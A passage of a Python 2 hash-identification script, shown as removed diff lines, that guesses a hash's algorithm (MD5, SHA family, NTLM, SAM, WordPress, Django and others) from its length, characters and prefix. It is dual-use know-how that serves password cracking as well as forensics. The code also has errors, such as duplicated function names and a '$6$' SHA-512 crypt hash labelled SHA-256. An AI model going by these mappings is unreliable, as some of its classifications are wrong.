SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); 